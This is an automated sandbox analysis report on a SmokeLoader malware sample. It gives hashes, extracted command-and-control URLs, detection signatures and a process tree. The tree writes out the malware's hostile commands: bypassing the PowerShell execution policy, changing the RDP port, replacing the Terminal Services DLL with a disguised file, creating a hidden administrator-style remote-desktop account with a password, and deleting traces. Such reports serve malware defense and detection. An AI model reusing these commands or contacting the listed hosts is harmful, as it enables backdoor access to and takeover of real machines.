Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
28-10-2021 15:12
Static task
static1
Behavioral task
behavioral1
Sample
e3bdb5a60e2574eb5796d3d471979b3a8e8bd5223d72560f74d4e5c0fbe25dc6.exe
Resource
win10-en-20210920
General
-
Target
e3bdb5a60e2574eb5796d3d471979b3a8e8bd5223d72560f74d4e5c0fbe25dc6.exe
-
Size
186KB
-
MD5
77402ae9e6880f83a282662fbfdea75c
-
SHA1
655495fab60a558634040b83cefe927c3cfa7578
-
SHA256
e3bdb5a60e2574eb5796d3d471979b3a8e8bd5223d72560f74d4e5c0fbe25dc6
-
SHA512
01f179c698e96fb1118ea08a40e96f941cebbf5386f980f832e5339b65c48486fff317208ec5ec50ca9f704bac39960f5d95d92173310cd7992dea6ea3ad29ad
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
smokeloader
2020
http://brandyjaggers.com/upload/
http://andbal.com/upload/
http://alotofquotes.com/upload/
http://szpnc.cn/upload/
http://uggeboots.com/upload/
http://100klv.com/upload/
http://rapmusic.at/upload/
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 56 3192 powershell.exe 58 3192 powershell.exe 59 3192 powershell.exe 60 3192 powershell.exe 62 3192 powershell.exe 64 3192 powershell.exe 66 3192 powershell.exe 68 3192 powershell.exe 71 3192 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
77DB.exepid process 2772 77DB.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
pid process 3036 -
Loads dropped DLL 2 IoCs
Processes:
pid process 1572 1572 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGICA61.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGICAC2.tmp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_4dwfkgmr.tiv.ps1 powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_xjvya5gl.jhz.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGICA41.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGICAB2.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGICA82.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
e3bdb5a60e2574eb5796d3d471979b3a8e8bd5223d72560f74d4e5c0fbe25dc6.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI e3bdb5a60e2574eb5796d3d471979b3a8e8bd5223d72560f74d4e5c0fbe25dc6.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI e3bdb5a60e2574eb5796d3d471979b3a8e8bd5223d72560f74d4e5c0fbe25dc6.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI e3bdb5a60e2574eb5796d3d471979b3a8e8bd5223d72560f74d4e5c0fbe25dc6.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeWMIC.exeWMIC.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 60 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 62 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 58 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 59 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
e3bdb5a60e2574eb5796d3d471979b3a8e8bd5223d72560f74d4e5c0fbe25dc6.exepid process 3648 e3bdb5a60e2574eb5796d3d471979b3a8e8bd5223d72560f74d4e5c0fbe25dc6.exe 3648 e3bdb5a60e2574eb5796d3d471979b3a8e8bd5223d72560f74d4e5c0fbe25dc6.exe 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3036 -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 632 632 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
e3bdb5a60e2574eb5796d3d471979b3a8e8bd5223d72560f74d4e5c0fbe25dc6.exepid process 3648 e3bdb5a60e2574eb5796d3d471979b3a8e8bd5223d72560f74d4e5c0fbe25dc6.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1756 powershell.exe Token: SeDebugPrivilege 2852 powershell.exe Token: SeIncreaseQuotaPrivilege 2852 powershell.exe Token: SeSecurityPrivilege 2852 powershell.exe Token: SeTakeOwnershipPrivilege 2852 powershell.exe Token: SeLoadDriverPrivilege 2852 powershell.exe Token: SeSystemProfilePrivilege 2852 powershell.exe Token: SeSystemtimePrivilege 2852 powershell.exe Token: SeProfSingleProcessPrivilege 2852 powershell.exe Token: SeIncBasePriorityPrivilege 2852 powershell.exe Token: SeCreatePagefilePrivilege 2852 powershell.exe Token: SeBackupPrivilege 2852 powershell.exe Token: SeRestorePrivilege 2852 powershell.exe Token: SeShutdownPrivilege 2852 powershell.exe Token: SeDebugPrivilege 2852 powershell.exe Token: SeSystemEnvironmentPrivilege 2852 powershell.exe Token: SeRemoteShutdownPrivilege 2852 powershell.exe Token: SeUndockPrivilege 2852 powershell.exe Token: SeManageVolumePrivilege 2852 powershell.exe Token: 33 2852 powershell.exe Token: 34 2852 powershell.exe Token: 35 2852 powershell.exe Token: 36 2852 powershell.exe Token: SeDebugPrivilege 1640 powershell.exe Token: SeIncreaseQuotaPrivilege 1640 powershell.exe Token: SeSecurityPrivilege 1640 powershell.exe Token: SeTakeOwnershipPrivilege 1640 powershell.exe Token: SeLoadDriverPrivilege 1640 powershell.exe Token: SeSystemProfilePrivilege 1640 powershell.exe Token: SeSystemtimePrivilege 1640 powershell.exe Token: SeProfSingleProcessPrivilege 1640 powershell.exe Token: SeIncBasePriorityPrivilege 1640 powershell.exe Token: SeCreatePagefilePrivilege 1640 powershell.exe Token: SeBackupPrivilege 1640 powershell.exe Token: SeRestorePrivilege 1640 powershell.exe Token: SeShutdownPrivilege 1640 powershell.exe Token: SeDebugPrivilege 1640 powershell.exe Token: SeSystemEnvironmentPrivilege 1640 powershell.exe Token: SeRemoteShutdownPrivilege 1640 powershell.exe Token: SeUndockPrivilege 1640 powershell.exe Token: SeManageVolumePrivilege 1640 powershell.exe Token: 33 1640 powershell.exe Token: 34 1640 powershell.exe Token: 35 1640 powershell.exe Token: 36 1640 powershell.exe Token: SeDebugPrivilege 372 powershell.exe Token: SeIncreaseQuotaPrivilege 372 powershell.exe Token: SeSecurityPrivilege 372 powershell.exe Token: SeTakeOwnershipPrivilege 372 powershell.exe Token: SeLoadDriverPrivilege 372 powershell.exe Token: SeSystemProfilePrivilege 372 powershell.exe Token: SeSystemtimePrivilege 372 powershell.exe Token: SeProfSingleProcessPrivilege 372 powershell.exe Token: SeIncBasePriorityPrivilege 372 powershell.exe Token: SeCreatePagefilePrivilege 372 powershell.exe Token: SeBackupPrivilege 372 powershell.exe Token: SeRestorePrivilege 372 powershell.exe Token: SeShutdownPrivilege 372 powershell.exe Token: SeDebugPrivilege 372 powershell.exe Token: SeSystemEnvironmentPrivilege 372 powershell.exe Token: SeRemoteShutdownPrivilege 372 powershell.exe Token: SeUndockPrivilege 372 powershell.exe Token: SeManageVolumePrivilege 372 powershell.exe Token: 33 372 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
pid process 3036 3036 -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
pid process 3036 3036 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
77DB.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exedescription pid process target process PID 3036 wrote to memory of 2772 3036 77DB.exe PID 3036 wrote to memory of 2772 3036 77DB.exe PID 2772 wrote to memory of 1756 2772 77DB.exe powershell.exe PID 2772 wrote to memory of 1756 2772 77DB.exe powershell.exe PID 1756 wrote to memory of 1676 1756 powershell.exe csc.exe PID 1756 wrote to memory of 1676 1756 powershell.exe csc.exe PID 1676 wrote to memory of 1952 1676 csc.exe cvtres.exe PID 1676 wrote to memory of 1952 1676 csc.exe cvtres.exe PID 1756 wrote to memory of 2852 1756 powershell.exe powershell.exe PID 1756 wrote to memory of 2852 1756 powershell.exe powershell.exe PID 1756 wrote to memory of 1640 1756 powershell.exe powershell.exe PID 1756 wrote to memory of 1640 1756 powershell.exe powershell.exe PID 1756 wrote to memory of 372 1756 powershell.exe powershell.exe PID 1756 wrote to memory of 372 1756 powershell.exe powershell.exe PID 1756 wrote to memory of 3012 1756 powershell.exe reg.exe PID 1756 wrote to memory of 3012 1756 powershell.exe reg.exe PID 1756 wrote to memory of 1504 1756 powershell.exe reg.exe PID 1756 wrote to memory of 1504 1756 powershell.exe reg.exe PID 1756 wrote to memory of 2284 1756 powershell.exe reg.exe PID 1756 wrote to memory of 2284 1756 powershell.exe reg.exe PID 1756 wrote to memory of 2996 1756 powershell.exe net.exe PID 1756 wrote to memory of 2996 1756 powershell.exe net.exe PID 2996 wrote to memory of 2988 2996 net.exe net1.exe PID 2996 wrote to memory of 2988 2996 net.exe net1.exe PID 1756 wrote to memory of 2556 1756 powershell.exe cmd.exe PID 1756 wrote to memory of 2556 1756 powershell.exe cmd.exe PID 2556 wrote to memory of 2264 2556 cmd.exe cmd.exe PID 2556 wrote to memory of 2264 2556 cmd.exe cmd.exe PID 2264 wrote to memory of 4076 2264 cmd.exe net.exe PID 2264 wrote to memory of 4076 2264 cmd.exe net.exe PID 4076 wrote to memory of 716 4076 net.exe net1.exe PID 4076 wrote to memory of 716 4076 net.exe net1.exe PID 1756 wrote to memory of 4040 1756 powershell.exe cmd.exe PID 1756 wrote to memory of 4040 1756 powershell.exe cmd.exe PID 4040 wrote to memory of 2364 4040 cmd.exe cmd.exe PID 4040 wrote to memory of 2364 4040 cmd.exe cmd.exe PID 2364 wrote to memory of 380 2364 cmd.exe net.exe PID 2364 wrote to memory of 380 2364 cmd.exe net.exe PID 380 wrote to memory of 948 380 net.exe net1.exe PID 380 wrote to memory of 948 380 net.exe net1.exe PID 2172 wrote to memory of 2816 2172 cmd.exe net.exe PID 2172 wrote to memory of 2816 2172 cmd.exe net.exe PID 2816 wrote to memory of 4024 2816 net.exe net1.exe PID 2816 wrote to memory of 4024 2816 net.exe net1.exe PID 1420 wrote to memory of 1740 1420 cmd.exe net.exe PID 1420 wrote to memory of 1740 1420 cmd.exe net.exe PID 1740 wrote to memory of 1304 1740 net.exe net1.exe PID 1740 wrote to memory of 1304 1740 net.exe net1.exe PID 1952 wrote to memory of 3544 1952 cmd.exe net.exe PID 1952 wrote to memory of 3544 1952 cmd.exe net.exe PID 3544 wrote to memory of 3180 3544 net.exe net1.exe PID 3544 wrote to memory of 3180 3544 net.exe net1.exe PID 1656 wrote to memory of 3744 1656 cmd.exe net.exe PID 1656 wrote to memory of 3744 1656 cmd.exe net.exe PID 3744 wrote to memory of 3868 3744 net.exe net1.exe PID 3744 wrote to memory of 3868 3744 net.exe net1.exe PID 3900 wrote to memory of 3012 3900 cmd.exe net.exe PID 3900 wrote to memory of 3012 3900 cmd.exe net.exe PID 3012 wrote to memory of 1504 3012 net.exe net1.exe PID 3012 wrote to memory of 1504 3012 net.exe net1.exe PID 3000 wrote to memory of 3808 3000 cmd.exe net.exe PID 3000 wrote to memory of 3808 3000 cmd.exe net.exe PID 3808 wrote to memory of 508 3808 net.exe net1.exe PID 3808 wrote to memory of 508 3808 net.exe net1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\e3bdb5a60e2574eb5796d3d471979b3a8e8bd5223d72560f74d4e5c0fbe25dc6.exe"C:\Users\Admin\AppData\Local\Temp\e3bdb5a60e2574eb5796d3d471979b3a8e8bd5223d72560f74d4e5c0fbe25dc6.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\77DB.exeC:\Users\Admin\AppData\Local\Temp\77DB.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sxx5tqxr\sxx5tqxr.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8DF4.tmp" "c:\Users\Admin\AppData\Local\Temp\sxx5tqxr\CSC29CC70492A45441EAE8F5CDB5DA5D327.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc TNC1opdG /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc TNC1opdG /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc TNC1opdG /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
